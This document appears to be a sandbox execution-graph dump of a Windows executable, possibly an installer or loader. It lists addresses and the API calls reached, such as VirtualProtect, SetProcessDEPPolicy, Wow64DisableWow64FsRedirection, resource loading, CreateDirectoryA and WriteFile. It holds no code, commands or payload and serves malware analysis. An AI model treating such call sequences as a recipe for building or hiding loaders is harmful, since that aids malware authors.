                                                          execution_graph 4986 409c40 5027 4030dc 4986->5027 4988 409c56 5030 4042e8 4988->5030 4990 409c5b 5033 40457c GetModuleHandleA GetProcAddress 4990->5033 4996 409c6a 5050 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4996->5050 5013 409d43 5112 4074a0 5013->5112 5015 409d05 5015->5013 5145 409aa0 5015->5145 5016 409d84 5116 407a28 5016->5116 5017 409d69 5017->5016 5018 409aa0 4 API calls 5017->5018 5018->5016 5020 409da9 5126 408b08 5020->5126 5024 409def 5025 408b08 21 API calls 5024->5025 5026 409e28 5024->5026 5025->5024 5155 403094 5027->5155 5029 4030e1 GetModuleHandleA GetCommandLineA 5029->4988 5032 404323 5030->5032 5156 403154 5030->5156 5032->4990 5034 404598 5033->5034 5035 40459f GetProcAddress 5033->5035 5034->5035 5036 4045b5 GetProcAddress 5035->5036 5037 4045ae 5035->5037 5038 4045c4 SetProcessDEPPolicy 5036->5038 5039 4045c8 5036->5039 5037->5036 5038->5039 5040 4065b8 5039->5040 5169 405c98 5040->5169 5049 406604 6F551CD0 5049->4996 5051 4090f7 5050->5051 5296 406fa0 SetErrorMode 5051->5296 5056 403198 4 API calls 5057 40913c 5056->5057 5058 409b30 GetSystemInfo VirtualQuery 5057->5058 5059 409be4 5058->5059 5062 409b5a 5058->5062 5064 409768 5059->5064 5060 409bc5 VirtualQuery 5060->5059 5060->5062 5061 409b84 VirtualProtect 5061->5062 5062->5059 5062->5060 5062->5061 5063 409bb3 VirtualProtect 5062->5063 5063->5060 5306 406bd0 GetCommandLineA 5064->5306 5066 409825 5068 4031b8 4 API calls 5066->5068 5067 406c2c 6 API calls 5071 409785 5067->5071 5069 40983f 5068->5069 5072 406c2c 5069->5072 5070 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5070->5071 5071->5066 5071->5067 5071->5070 5073 406c53 GetModuleFileNameA 5072->5073 5074 406c77 GetCommandLineA 5072->5074 5075 403278 4 API calls 5073->5075 5076 406c7c 5074->5076 5077 406c75 5075->5077 5078 406c81 5076->5078 5079 406af0 4 API calls 5076->5079 5082 406c89 5076->5082 5080 406ca4 5077->5080 5081 403198 4 API calls 5078->5081 5079->5076 5083 403198 4 API calls 5080->5083 5081->5082 5084 40322c 4 API calls 5082->5084 5085 406cb9 5083->5085 5084->5080 5086 4031e8 5085->5086 5087 4031ec 5086->5087 5090 4031fc 5086->5090 5089 403254 4 API calls 5087->5089 5087->5090 5088 403228 5092 4074e0 5088->5092 5089->5090 5090->5088 5091 4025ac 4 API calls 5090->5091 5091->5088 5093 4074ea 5092->5093 5327 407576 5093->5327 5330 407578 5093->5330 5094 407516 5095 40752a 5094->5095 5333 40748c GetLastError 5094->5333 5099 409bec FindResourceA 5095->5099 5100 409c01 5099->5100 5101 409c06 SizeofResource 5099->5101 5102 409aa0 4 API calls 5100->5102 5103 409c13 5101->5103 5104 409c18 LoadResource 5101->5104 5102->5101 5105 409aa0 4 API calls 5103->5105 5106 409c26 5104->5106 5107 409c2b LockResource 5104->5107 5105->5104 5108 409aa0 4 API calls 5106->5108 5109 409c37 5107->5109 5110 409c3c 5107->5110 5108->5107 5111 409aa0 4 API calls 5109->5111 5110->5015 5142 407918 5110->5142 5111->5110 5113 4074b4 5112->5113 5114 4074c4 5113->5114 5115 4073ec 20 API calls 5113->5115 5114->5017 5115->5114 5117 407a35 5116->5117 5118 405880 4 API calls 5117->5118 5119 407a89 5117->5119 5118->5119 5120 407918 InterlockedExchange 5119->5120 5121 407a9b 5120->5121 5122 405880 4 API calls 5121->5122 5123 407ab1 5121->5123 5122->5123 5124 407af4 5123->5124 5125 405880 4 API calls 5123->5125 5124->5020 5125->5124 5130 408b82 5126->5130 5133 408b39 5126->5133 5127 408bcd 5441 407cb8 5127->5441 5129 408be4 5134 4031b8 4 API calls 5129->5134 5130->5127 5132 4034f0 4 API calls 5130->5132 5138 4031e8 4 API calls 5130->5138 5139 403420 4 API calls 5130->5139 5141 407cb8 21 API calls 5130->5141 5132->5130 5133->5130 5135 403420 4 API calls 5133->5135 5136 4031e8 4 API calls 5133->5136 5140 407cb8 21 API calls 5133->5140 5432 4034f0 5133->5432 5137 408bfe 5134->5137 5135->5133 5136->5133 5152 404c10 5137->5152 5138->5130 5139->5130 5140->5133 5141->5130 5467 4078c4 5142->5467 5146 409ac1 5145->5146 5147 409aa9 5145->5147 5149 405880 4 API calls 5146->5149 5148 405880 4 API calls 5147->5148 5150 409abb 5148->5150 5151 409ad2 5149->5151 5150->5013 5151->5013 5153 402594 4 API calls 5152->5153 5154 404c1b 5153->5154 5154->5024 5155->5029 5157 403164 5156->5157 5158 40318c TlsGetValue 5156->5158 5157->5032 5159 403196 5158->5159 5160 40316f 5158->5160 5159->5032 5164 40310c 5160->5164 5162 403174 TlsGetValue 5163 403184 5162->5163 5163->5032 5165 403120 LocalAlloc 5164->5165 5166 403116 5164->5166 5167 40313e TlsSetValue 5165->5167 5168 403132 5165->5168 5166->5165 5167->5168 5168->5162 5241 405930 5169->5241 5172 405270 GetSystemDefaultLCID 5176 4052a6 5172->5176 5173 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5173->5176 5174 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5174->5176 5175 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5175->5176 5176->5173 5176->5174 5176->5175 5180 405308 5176->5180 5177 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5177->5180 5178 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5178->5180 5179 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5179->5180 5180->5177 5180->5178 5180->5179 5181 40538b 5180->5181 5274 4031b8 5181->5274 5184 4053b4 GetSystemDefaultLCID 5278 4051fc GetLocaleInfoA 5184->5278 5187 4031e8 4 API calls 5188 4053f4 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405409 5189->5190 5191 4051fc 5 API calls 5190->5191 5192 40542d 5191->5192 5284 405248 GetLocaleInfoA 5192->5284 5195 405248 GetLocaleInfoA 5196 40545d 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 405477 5197->5198 5199 405248 GetLocaleInfoA 5198->5199 5200 405494 5199->5200 5201 4051fc 5 API calls 5200->5201 5202 4054ae 5201->5202 5203 4031e8 4 API calls 5202->5203 5204 4054bb 5203->5204 5205 4051fc 5 API calls 5204->5205 5206 4054d0 5205->5206 5207 4031e8 4 API calls 5206->5207 5208 4054dd 5207->5208 5209 405248 GetLocaleInfoA 5208->5209 5210 4054eb 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405505 5211->5212 5213 4031e8 4 API calls 5212->5213 5214 405512 5213->5214 5215 4051fc 5 API calls 5214->5215 5216 405527 5215->5216 5217 4031e8 4 API calls 5216->5217 5218 405534 5217->5218 5219 4051fc 5 API calls 5218->5219 5220 405549 5219->5220 5221 405566 5220->5221 5222 405557 5220->5222 5224 40322c 4 API calls 5221->5224 5292 40322c 5222->5292 5225 405564 5224->5225 5226 4051fc 5 API calls 5225->5226 5227 405588 5226->5227 5228 4055a5 5227->5228 5229 405596 5227->5229 5231 403198 4 API calls 5228->5231 5230 40322c 4 API calls 5229->5230 5232 4055a3 5230->5232 5231->5232 5286 4033b4 5232->5286 5234 4055c7 5235 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5234->5235 5236 4055e1 5235->5236 5237 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5236->5237 5238 4055fb 5237->5238 5239 405ce4 GetVersionExA 5238->5239 5240 405cfb 5239->5240 5240->5049 5242 40593c 5241->5242 5249 404ccc LoadStringA 5242->5249 5245 4031e8 4 API calls 5246 40596d 5245->5246 5252 403198 5246->5252 5256 403278 5249->5256 5253 4031b7 5252->5253 5254 40319e 5252->5254 5253->5172 5254->5253 5270 4025ac 5254->5270 5261 403254 5256->5261 5258 403288 5259 403198 4 API calls 5258->5259 5260 4032a0 5259->5260 5260->5245 5262 403274 5261->5262 5263 403258 5261->5263 5262->5258 5266 402594 5263->5266 5265 403261 5265->5258 5267 402598 5266->5267 5268 4025a2 5266->5268 5267->5268 5269 403154 4 API calls 5267->5269 5268->5265 5268->5268 5269->5268 5271 4025b0 5270->5271 5272 4025ba 5270->5272 5271->5272 5273 403154 4 API calls 5271->5273 5272->5253 5272->5272 5273->5272 5275 4031be 5274->5275 5276 4031e3 5275->5276 5277 4025ac 4 API calls 5275->5277 5276->5184 5277->5275 5279 405223 5278->5279 5280 405235 5278->5280 5282 403278 4 API calls 5279->5282 5281 40322c 4 API calls 5280->5281 5283 405233 5281->5283 5282->5283 5283->5187 5285 405264 5284->5285 5285->5195 5287 4033bc 5286->5287 5288 403254 4 API calls 5287->5288 5289 4033cf 5288->5289 5290 4031e8 4 API calls 5289->5290 5291 4033f7 5290->5291 5294 403230 5292->5294 5293 403252 5293->5225 5294->5293 5295 4025ac 4 API calls 5294->5295 5295->5293 5304 403414 5296->5304 5299 406fee 5300 407284 FormatMessageA 5299->5300 5301 4072aa 5300->5301 5302 403278 4 API calls 5301->5302 5303 4072c7 5302->5303 5303->5056 5305 403418 LoadLibraryA 5304->5305 5305->5299 5313 406af0 5306->5313 5308 406bf3 5309 406af0 4 API calls 5308->5309 5310 406c05 5308->5310 5309->5308 5311 403198 4 API calls 5310->5311 5312 406c1a 5311->5312 5312->5071 5314 406b1c 5313->5314 5315 403278 4 API calls 5314->5315 5316 406b29 5315->5316 5323 403420 5316->5323 5318 406b31 5319 4031e8 4 API calls 5318->5319 5320 406b49 5319->5320 5321 403198 4 API calls 5320->5321 5322 406b6b 5321->5322 5322->5308 5324 403426 5323->5324 5326 403437 5323->5326 5325 403254 4 API calls 5324->5325 5324->5326 5325->5326 5326->5318 5328 407578 5327->5328 5329 4075b7 CreateFileA 5328->5329 5329->5094 5331 403414 5330->5331 5332 4075b7 CreateFileA 5331->5332 5332->5094 5336 4073ec 5333->5336 5337 407284 5 API calls 5336->5337 5338 407414 5337->5338 5339 407434 5338->5339 5345 405184 5338->5345 5348 405880 5339->5348 5342 407443 5343 403198 4 API calls 5342->5343 5344 407460 5343->5344 5344->5095 5352 405198 5345->5352 5349 405887 5348->5349 5350 4031e8 4 API calls 5349->5350 5351 40589f 5350->5351 5351->5342 5353 4051b5 5352->5353 5360 404e48 5353->5360 5356 4051e1 5358 403278 4 API calls 5356->5358 5359 405193 5358->5359 5359->5339 5363 404e63 5360->5363 5361 404e75 5361->5356 5365 404bd4 5361->5365 5363->5361 5368 404f6a 5363->5368 5375 404e3c 5363->5375 5366 405930 5 API calls 5365->5366 5367 404be5 5366->5367 5367->5356 5369 404f7b 5368->5369 5372 404fc9 5368->5372 5371 40504f 5369->5371 5369->5372 5374 404fe7 5371->5374 5382 404e28 5371->5382 5372->5374 5378 404de4 5372->5378 5374->5363 5376 403198 4 API calls 5375->5376 5377 404e46 5376->5377 5377->5363 5379 404df2 5378->5379 5385 404bec 5379->5385 5381 404e20 5381->5372 5398 4039a4 5382->5398 5388 4059a0 5385->5388 5387 404c05 5387->5381 5389 4059ae 5388->5389 5390 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5389->5390 5391 4059d8 5390->5391 5392 405184 19 API calls 5391->5392 5393 4059e6 5392->5393 5394 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5393->5394 5395 4059f1 5394->5395 5396 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5395->5396 5397 405a0b 5396->5397 5397->5387 5399 4039ab 5398->5399 5404 4038b4 5399->5404 5401 4039cb 5402 403198 4 API calls 5401->5402 5403 4039d2 5402->5403 5403->5374 5405 4038d5 5404->5405 5406 4038c8 5404->5406 5408 403934 5405->5408 5409 4038db 5405->5409 5407 403780 6 API calls 5406->5407 5414 4038d0 5407->5414 5412 403993 5408->5412 5413 40393b 5408->5413 5410 4038e1 5409->5410 5411 4038ee 5409->5411 5415 403894 6 API calls 5410->5415 5416 403894 6 API calls 5411->5416 5417 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5412->5417 5418 403941 5413->5418 5419 40394b 5413->5419 5414->5401 5415->5414 5421 4038fc 5416->5421 5417->5414 5422 403864 9 API calls 5418->5422 5420 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5419->5420 5423 40395d 5420->5423 5424 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5421->5424 5422->5414 5425 403864 9 API calls 5423->5425 5426 403917 5424->5426 5427 403976 5425->5427 5428 40374c VariantClear 5426->5428 5429 40374c VariantClear 5427->5429 5430 40392c 5428->5430 5431 40398b 5429->5431 5430->5401 5431->5401 5433 4034fd 5432->5433 5440 40352d 5432->5440 5434 403526 5433->5434 5437 403509 5433->5437 5438 403254 4 API calls 5434->5438 5435 403198 4 API calls 5436 403517 5435->5436 5436->5133 5447 4025c4 5437->5447 5438->5440 5440->5435 5442 407cd3 5441->5442 5444 407cc8 5441->5444 5451 407c5c 5442->5451 5444->5129 5446 405880 4 API calls 5446->5444 5448 4025ca 5447->5448 5449 4025dc 5448->5449 5450 403154 4 API calls 5448->5450 5449->5436 5449->5449 5450->5449 5452 407c70 5451->5452 5453 407caf 5451->5453 5452->5453 5455 407bac 5452->5455 5453->5444 5453->5446 5456 407bb7 5455->5456 5457 407bc8 5455->5457 5458 405880 4 API calls 5456->5458 5459 4074a0 20 API calls 5457->5459 5458->5457 5460 407bdc 5459->5460 5461 4074a0 20 API calls 5460->5461 5462 407bfd 5461->5462 5463 407918 InterlockedExchange 5462->5463 5464 407c12 5463->5464 5465 407c28 5464->5465 5466 405880 4 API calls 5464->5466 5465->5452 5466->5465 5468 4078d6 5467->5468 5469 4078e7 5467->5469 5470 4078db InterlockedExchange 5468->5470 5469->5015 5470->5469 6243 409e47 6244 409e6c 6243->6244 6245 4098f4 15 API calls 6244->6245 6248 409e71 6245->6248 6246 409ec4 6277 4026c4 GetSystemTime 6246->6277 6248->6246 6252 408dd8 4 API calls 6248->6252 6249 409ec9 6250 409330 32 API calls 6249->6250 6251 409ed1 6250->6251 6253 4031e8 4 API calls 6251->6253 6254 409ea0 6252->6254 6255 409ede 6253->6255 6257 409ea8 MessageBoxA 6254->6257 6256 406928 5 API calls 6255->6256 6258 409eeb 6256->6258 6257->6246 6259 409eb5 6257->6259 6260 4066c0 5 API calls 6258->6260 6261 405854 5 API calls 6259->6261 6262 409efb 6260->6262 6261->6246 6263 406638 5 API calls 6262->6263 6264 409f0c 6263->6264 6265 403340 4 API calls 6264->6265 6266 409f1a 6265->6266 6267 4031e8 4 API calls 6266->6267 6268 409f2a 6267->6268 6269 4074e0 23 API calls 6268->6269 6270 409f69 6269->6270 6271 402594 4 API calls 6270->6271 6272 409f89 6271->6272 6273 407a28 5 API calls 6272->6273 6274 409fcb 6273->6274 6275 407cb8 21 API calls 6274->6275 6276 409ff2 6275->6276 6277->6249 6204 407548 6205 407554 CloseHandle 6204->6205 6206 40755d 6204->6206 6205->6206 6656 402b48 RaiseException 6207 407749 6208 4076dc WriteFile 6207->6208 6215 407724 6207->6215 6209 4076e8 6208->6209 6210 4076ef 6208->6210 6211 40748c 21 API calls 6209->6211 6212 407700 6210->6212 6213 4073ec 20 API calls 6210->6213 6211->6210 6213->6212 6214 4077e0 6216 4078db InterlockedExchange 6214->6216 6218 407890 6214->6218 6215->6207 6215->6214 6217 4078e7 6216->6217 6657 40294a 6658 402952 6657->6658 6659 403554 4 API calls 6658->6659 6660 402967 6658->6660 6659->6658 6661 403f4a 6662 403f53 6661->6662 6664 403f5c 6661->6664 6665 403f07 6662->6665 6668 403f09 6665->6668 6667 403f3c 6667->6664 6669 403154 4 API calls 6668->6669 6671 403e9c 6668->6671 6674 403f3d 6668->6674 6688 403e9c 6668->6688 6669->6668 6670 403ef2 6673 402674 4 API calls 6670->6673 6671->6667 6671->6670 6677 403ea9 6671->6677 6679 403e8e 6671->6679 6676 403ecf 6673->6676 6674->6664 6676->6664 6677->6676 6678 402674 4 API calls 6677->6678 6678->6676 6680 403e4c 6679->6680 6681 403e62 6680->6681 6682 403e7b 6680->6682 6684 403e67 6680->6684 6683 403cc8 4 API calls 6681->6683 6685 402674 4 API calls 6682->6685 6683->6684 6686 403e78 6684->6686 6687 402674 4 API calls 6684->6687 6685->6686 6686->6670 6686->6677 6687->6686 6689 403ed7 6688->6689 6695 403ea9 6688->6695 6691 403ef2 6689->6691 6692 403e8e 4 API calls 6689->6692 6690 403ecf 6690->6668 6693 402674 4 API calls 6691->6693 6694 403ee6 6692->6694 6693->6690 6694->6691 6694->6695 6695->6690 6696 402674 4 API calls 6695->6696 6696->6690 6705 405150 6706 405163 6705->6706 6707 404e48 19 API calls 6706->6707 6708 405177 6707->6708 6278 403a52 6279 403a5a WriteFile 6278->6279 6281 403a74 6278->6281 6280 403a78 GetLastError 6279->6280 6279->6281 6280->6281 6282 402654 6283 403154 4 API calls 6282->6283 6284 402614 6283->6284 6285 402632 6284->6285 6286 403154 4 API calls 6284->6286 6286->6285 5653 409e62 5654 409aa0 4 API calls 5653->5654 5655 409e67 5654->5655 5656 409e6c 5655->5656 5756 402f24 5655->5756 5690 4098f4 5656->5690 5659 409ec4 5695 4026c4 GetSystemTime 5659->5695 5661 409e71 5661->5659 5761 408dd8 5661->5761 5662 409ec9 5696 409330 5662->5696 5666 4031e8 4 API calls 5668 409ede 5666->5668 5667 409ea0 5670 409ea8 MessageBoxA 5667->5670 5714 406928 5668->5714 5670->5659 5672 409eb5 5670->5672 5764 405854 5672->5764 5677 409f0c 5741 403340 5677->5741 5679 409f1a 5680 4031e8 4 API calls 5679->5680 5681 409f2a 5680->5681 5682 4074e0 23 API calls 5681->5682 5683 409f69 5682->5683 5684 402594 4 API calls 5683->5684 5685 409f89 5684->5685 5686 407a28 5 API calls 5685->5686 5687 409fcb 5686->5687 5688 407cb8 21 API calls 5687->5688 5689 409ff2 5688->5689 5768 40953c 5690->5768 5695->5662 5699 409350 5696->5699 5700 409375 CreateDirectoryA 5699->5700 5704 408dd8 4 API calls 5699->5704 5710 407284 5 API calls 5699->5710 5713 405880 4 API calls 5699->5713 5860 406cf4 5699->5860 5883 409224 5699->5883 5902 404c84 5699->5902 5905 408da8 5699->5905 5701 4093ed 5700->5701 5702 40937f GetLastError 5700->5702 5703 40322c 4 API calls 5701->5703 5702->5699 5705 4093f7 5703->5705 5704->5699 5706 4031b8 4 API calls 5705->5706 5708 409411 5706->5708 5709 4031b8 4 API calls 5708->5709 5711 40941e 5709->5711 5710->5699 5711->5666 5713->5699 6015 406820 5714->6015 5717 403454 4 API calls 5718 40694a 5717->5718 5719 4066c0 5718->5719 6020 4068e4 5719->6020 5722 4066f0 5724 403340 4 API calls 5722->5724 5723 4066fe 5725 403454 4 API calls 5723->5725 5728 4066fc 5724->5728 5726 406711 5725->5726 5727 403340 4 API calls 5726->5727 5727->5728 5729 403198 4 API calls 5728->5729 5730 406733 5729->5730 5731 406638 5730->5731 5732 406642 5731->5732 5733 406665 5731->5733 6026 406950 5732->6026 5734 40322c 4 API calls 5733->5734 5736 40666e 5734->5736 5736->5677 5737 406649 5737->5733 5738 406654 5737->5738 5739 403340 4 API calls 5738->5739 5740 406662 5739->5740 5740->5677 5742 403344 5741->5742 5743 4033a5 5741->5743 5744 4031e8 5742->5744 5745 40334c 5742->5745 5746 4031fc 5744->5746 5750 403254 4 API calls 5744->5750 5745->5743 5748 4031e8 4 API calls 5745->5748 5751 40335b 5745->5751 5747 403228 5746->5747 5752 4025ac 4 API calls 5746->5752 5747->5679 5748->5751 5749 403254 4 API calls 5753 403375 5749->5753 5750->5746 5751->5749 5752->5747 5754 4031e8 4 API calls 5753->5754 5755 4033a1 5754->5755 5755->5679 5757 403154 4 API calls 5756->5757 5758 402f29 5757->5758 6032 402bcc 5758->6032 5760 402f51 5760->5760 5762 408da8 4 API calls 5761->5762 5763 408df4 5762->5763 5763->5667 5765 405859 5764->5765 5766 405930 5 API calls 5765->5766 5767 40586b 5766->5767 5767->5767 5775 40955b 5768->5775 5769 409590 5771 40959d GetUserDefaultLangID 5769->5771 5776 409592 5769->5776 5770 409594 5786 407024 GetModuleHandleA GetProcAddress 5770->5786 5771->5776 5774 40956f 5780 409884 5774->5780 5775->5769 5775->5770 5775->5774 5776->5774 5777 4095cb GetACP 5776->5777 5778 4095ef 5776->5778 5777->5774 5777->5776 5778->5774 5779 409615 GetACP 5778->5779 5779->5774 5779->5778 5781 40988c 5780->5781 5785 4098c6 5780->5785 5782 403420 4 API calls 5781->5782 5781->5785 5783 4098c0 5782->5783 5844 408e80 5783->5844 5785->5661 5787 407067 5786->5787 5788 40705e 5786->5788 5789 407070 5787->5789 5790 4070a8 5787->5790 5799 403198 4 API calls 5788->5799 5807 406f68 5789->5807 5792 406f68 RegOpenKeyExA 5790->5792 5794 4070c1 5792->5794 5793 407089 5795 4070de 5793->5795 5810 406f5c 5793->5810 5794->5795 5796 406f5c 6 API calls 5794->5796 5797 40322c 4 API calls 5795->5797 5800 4070d5 RegCloseKey 5796->5800 5801 4070eb 5797->5801 5803 407120 5799->5803 5800->5795 5813 4032fc 5801->5813 5805 403198 4 API calls 5803->5805 5806 407128 5805->5806 5806->5776 5808 406f73 5807->5808 5809 406f79 RegOpenKeyExA 5807->5809 5808->5809 5809->5793 5827 406e10 5810->5827 5814 403300 5813->5814 5815 40333f 5813->5815 5816 4031e8 5814->5816 5817 40330a 5814->5817 5815->5788 5823 403254 4 API calls 5816->5823 5824 4031fc 5816->5824 5818 403334 5817->5818 5819 40331d 5817->5819 5820 4034f0 4 API calls 5818->5820 5822 4034f0 4 API calls 5819->5822 5826 403322 5820->5826 5821 403228 5821->5788 5822->5826 5823->5824 5824->5821 5825 4025ac 4 API calls 5824->5825 5825->5821 5826->5788 5828 406e36 RegQueryValueExA 5827->5828 5829 406e7b 5828->5829 5833 406e59 5828->5833 5831 403198 4 API calls 5829->5831 5830 406e73 5834 403198 4 API calls 5830->5834 5832 406f47 RegCloseKey 5831->5832 5832->5795 5833->5829 5833->5830 5835 403278 4 API calls 5833->5835 5836 403420 4 API calls 5833->5836 5834->5829 5835->5833 5837 406eb0 RegQueryValueExA 5836->5837 5837->5828 5838 406ecc 5837->5838 5838->5829 5839 4034f0 4 API calls 5838->5839 5840 406f0e 5839->5840 5841 406f20 5840->5841 5843 403420 4 API calls 5840->5843 5842 4031e8 4 API calls 5841->5842 5842->5829 5843->5841 5845 408e8e 5844->5845 5847 408ea6 5845->5847 5857 408e18 5845->5857 5848 408e18 4 API calls 5847->5848 5849 408eca 5847->5849 5848->5849 5850 407918 InterlockedExchange 5849->5850 5851 408ee5 5850->5851 5852 408e18 4 API calls 5851->5852 5853 408ef8 5851->5853 5852->5853 5854 408e18 4 API calls 5853->5854 5855 403278 4 API calls 5853->5855 5856 408f27 5853->5856 5854->5853 5855->5853 5856->5785 5858 405880 4 API calls 5857->5858 5859 408e29 5858->5859 5859->5847 5909 406a58 5860->5909 5863 406d26 5865 406a58 5 API calls 5863->5865 5867 406d72 5863->5867 5866 406d36 5865->5866 5868 406a34 7 API calls 5866->5868 5870 406d42 5866->5870 5917 406888 5867->5917 5868->5870 5870->5867 5871 406a58 5 API calls 5870->5871 5880 406d67 5870->5880 5875 406d5b 5871->5875 5874 406638 5 API calls 5876 406d87 5874->5876 5878 406a34 7 API calls 5875->5878 5875->5880 5877 40322c 4 API calls 5876->5877 5879 406d91 5877->5879 5878->5880 5881 4031b8 4 API calls 5879->5881 5880->5867 5929 406cc8 GetWindowsDirectoryA 5880->5929 5882 406dab 5881->5882 5882->5699 5884 409244 5883->5884 5885 406638 5 API calls 5884->5885 5886 40925d 5885->5886 5887 40322c 4 API calls 5886->5887 5894 409268 5887->5894 5888 406978 6 API calls 5888->5894 5890 4033b4 4 API calls 5890->5894 5891 408dd8 4 API calls 5891->5894 5893 405880 4 API calls 5893->5894 5894->5888 5894->5890 5894->5891 5894->5893 5895 4092e4 5894->5895 5969 4091b0 5894->5969 5977 409034 5894->5977 5896 40322c 4 API calls 5895->5896 5897 4092ef 5896->5897 5898 4031b8 4 API calls 5897->5898 5899 409309 5898->5899 5900 403198 4 API calls 5899->5900 5901 409311 5900->5901 5901->5699 5903 405198 19 API calls 5902->5903 5904 404ca2 5903->5904 5904->5699 5906 408dc8 5905->5906 6005 408c80 5906->6005 5910 4034f0 4 API calls 5909->5910 5912 406a6b 5910->5912 5911 406a82 GetEnvironmentVariableA 5911->5912 5913 406a8e 5911->5913 5912->5911 5916 406a95 5912->5916 5931 406dec 5912->5931 5914 403198 4 API calls 5913->5914 5914->5916 5916->5863 5926 406a34 5916->5926 5918 403414 5917->5918 5919 4068ab GetFullPathNameA 5918->5919 5920 4068b7 5919->5920 5921 4068ce 5919->5921 5920->5921 5922 4068bf 5920->5922 5923 40322c 4 API calls 5921->5923 5924 403278 4 API calls 5922->5924 5925 4068cc 5923->5925 5924->5925 5925->5874 5935 4069dc 5926->5935 5930 406ce9 5929->5930 5930->5867 5932 406dfa 5931->5932 5933 4034f0 4 API calls 5932->5933 5934 406e08 5933->5934 5934->5912 5942 406978 5935->5942 5937 4069fe 5938 406a06 GetFileAttributesA 5937->5938 5939 406a1b 5938->5939 5940 403198 4 API calls 5939->5940 5941 406a23 5940->5941 5941->5863 5952 406744 5942->5952 5944 4069b0 5947 4069c6 5944->5947 5948 4069bb 5944->5948 5946 406989 5946->5944 5959 406970 CharPrevA 5946->5959 5960 403454 5947->5960 5949 40322c 4 API calls 5948->5949 5951 4069c4 5949->5951 5951->5937 5955 406755 5952->5955 5953 4067b9 5954 406680 IsDBCSLeadByte 5953->5954 5956 4067b4 5953->5956 5954->5956 5955->5953 5958 406773 5955->5958 5956->5946 5958->5956 5967 406680 IsDBCSLeadByte 5958->5967 5959->5946 5961 403486 5960->5961 5962 403459 5960->5962 5963 403198 4 API calls 5961->5963 5962->5961 5965 40346d 5962->5965 5964 40347c 5963->5964 5964->5951 5966 403278 4 API calls 5965->5966 5966->5964 5968 406694 5967->5968 5968->5958 5970 403198 4 API calls 5969->5970 5972 4091d1 5970->5972 5974 4091fe 5972->5974 5986 4032a8 5972->5986 5989 403494 5972->5989 5975 403198 4 API calls 5974->5975 5976 409213 5975->5976 5976->5894 5993 408f70 5977->5993 5979 40904a 5980 40904e 5979->5980 5999 406a48 5979->5999 5980->5894 5983 409081 6002 408fac 5983->6002 5987 403278 4 API calls 5986->5987 5988 4032b5 5987->5988 5988->5972 5990 4034c3 5989->5990 5991 403498 5989->5991 5990->5972 5992 4034f0 4 API calls 5991->5992 5992->5990 5994 408f7a 5993->5994 5995 408f7e 5993->5995 5994->5979 5996 408fa0 SetLastError 5995->5996 5997 408f87 Wow64DisableWow64FsRedirection 5995->5997 5998 408f9b 5996->5998 5997->5998 5998->5979 6000 4069dc 7 API calls 5999->6000 6001 406a52 GetLastError 6000->6001 6001->5983 6003 408fb1 Wow64RevertWow64FsRedirection 6002->6003 6004 408fbb 6002->6004 6003->6004 6004->5894 6006 403198 4 API calls 6005->6006 6007 408cb1 6005->6007 6006->6007 6009 408cc8 6007->6009 6011 403278 4 API calls 6007->6011 6013 4032fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue 6007->6013 6014 408cdc 6007->6014 6008 4031b8 4 API calls 6010 408d69 6008->6010 6012 4032fc 4 API calls 6009->6012 6010->5699 6011->6007 6012->6014 6013->6007 6014->6008 6016 406744 IsDBCSLeadByte 6015->6016 6018 406835 6016->6018 6017 40687f 6017->5717 6018->6017 6019 406680 IsDBCSLeadByte 6018->6019 6019->6018 6021 4068f3 6020->6021 6022 406820 IsDBCSLeadByte 6021->6022 6025 4068fe 6022->6025 6023 4066ea 6023->5722 6023->5723 6024 406680 IsDBCSLeadByte 6024->6025 6025->6023 6025->6024 6027 406957 6026->6027 6028 40695b 6026->6028 6027->5737 6031 406970 CharPrevA 6028->6031 6030 40696c 6030->5737 6031->6030 6033 402bd5 RaiseException 6032->6033 6034 402be6 6032->6034 6033->6034 6034->5760 6287 402e64 6288 402e69 6287->6288 6289 402e7a RtlUnwind 6288->6289 6290 402e5e 6288->6290 6291 402e9d 6289->6291 6308 40667c IsDBCSLeadByte 6309 406694 6308->6309 6721 403f7d 6722 403fa2 6721->6722 6725 403f84 6721->6725 6724 403e8e 4 API calls 6722->6724 6722->6725 6723 403f8c 6724->6725 6725->6723 6726 402674 4 API calls 6725->6726 6727 403fca 6726->6727 6734 403d02 6736 403d12 6734->6736 6735 403ddf ExitProcess 6736->6735 6737 403db8 6736->6737 6739 403dea 6736->6739 6744 403da4 6736->6744 6745 403d8f MessageBoxA 6736->6745 6738 403cc8 4 API calls 6737->6738 6740 403dc2 6738->6740 6741 403cc8 4 API calls 6740->6741 6742 403dcc 6741->6742 6754 4019dc 6742->6754 6750 403fe4 6744->6750 6745->6737 6746 403dd1 6746->6735 6746->6739 6751 403fe8 6750->6751 6752 403f07 4 API calls 6751->6752 6753 404006 6752->6753 6755 401abb 6754->6755 6756 4019ed 6754->6756 6755->6746 6757 401a04 RtlEnterCriticalSection 6756->6757 6758 401a0e LocalFree 6756->6758 6757->6758 6759 401a41 6758->6759 6760 401a2f VirtualFree 6759->6760 6761 401a49 6759->6761 6760->6759 6762 401a70 LocalFree 6761->6762 6763 401a87 6761->6763 6762->6762 6762->6763 6764 401aa9 RtlDeleteCriticalSection 6763->6764 6765 401a9f RtlLeaveCriticalSection 6763->6765 6764->6746 6765->6764 6318 404206 6319 4041cc 6318->6319 6322 40420a 6318->6322 6320 404282 6321 403154 4 API calls 6323 404323 6321->6323 